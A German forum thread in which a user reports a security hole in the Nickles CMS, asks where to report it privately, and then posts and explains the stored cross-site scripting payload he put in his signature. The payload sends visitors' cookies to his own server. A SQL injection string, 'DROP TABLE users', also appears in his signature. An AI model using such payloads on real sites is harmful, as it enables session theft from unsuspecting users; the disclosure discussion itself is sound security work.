Kritik und Fragen an Nickles 2.713 Themen, 23.043 Beiträge

Gravierende Sicherheitslücke bei Nickles. Wo melden?

Synthetic_codes / 25 Antworten / Flachansicht Nickles

Moinsen... Ich habe mal wieder eine Sicherheitslücke im Nickles CMS entdeckt, die in die kategorie GAU einzustufen wäre. Aus diesem grund will ich die natürlich nicht öffentlich melden. Wie ist das bei euch vorgesehen? Ein Kontaktformular wäre da vielleicht auch mal nicht unnütz :-)

'); DROP TABLE users;--
bei Antwort benachrichtigen
Synthetic_codes kongking „Hallo Olaf, was Synthetik_codes da jetzt exakt gemacht hat, kann ich Dir auch...“
Optionen

dann will ich mal den quelltext meines "exploits" posten:(is ja nur eine zeile^^)

http://www.abload.de/img/sigt52d.jpg" onmousemove='java_script:document.getElementsByTagName("div")[0].innerHTML = document.getElementsByTagName("div")[0].innerHTML + ""'>" target="_blank" rel="nofollow">http://meinhostname.com/test.php?data="+escape(document.cookie)+"\">"'>

das hatte ich in meine signatur gesetzt. Sieht alles ein wenig kryptisch aus, vor allem da ich die '"' escapen musste um gültiges Javascript zu erhalten, aber im wesentlichen sieht es wie folgt aus:

<img
src="http://www.abload.de/img/sigt52d.jpg"
onmousemove=

java_script:document.getElementsByTagName("div")[0].innerHTML = document.getElementsByTagName("div")[0].innerHTML + ""'" target="_blank" rel="nofollow">http://meinhostname.com/test.php?data="+escape(document.cookie)+"\">"'

Was macht die Zeile? Sie sucht nach dem ersten div-tag(getElementsByTagName), und setzt deren Inhalt auf den bisherigen inhalt und addiert bei der gelegenheit lt;img src=\"" target="_blank" rel="nofollow">http://meinhostname.com/test.php?data="+escape(document.cookie)+"\">
hinzu. da die test.php nicht darauf gebinst war, ein gültiges bild zurückzugeben(zu faul unso) gab es die vielen Thumbnails die kongking entdeckt hat. wie man sieht wird an das php script der Parameter data angehängt. die funktion escape() sorgt dafür dass die cookies in eine gültige URL Syntax umgewandelt werden, und es keine probleme mit dem auslesen auf serverseite gibt

/*EDIT: Wie es scheint, filtert das nickles CMS das wort J A V A S C R I P T in diesem posting aus, daher habe ich alle vorkommen in java_script substituiert */

'); DROP TABLE users;--
bei Antwort benachrichtigen
javascript Synthetic_codes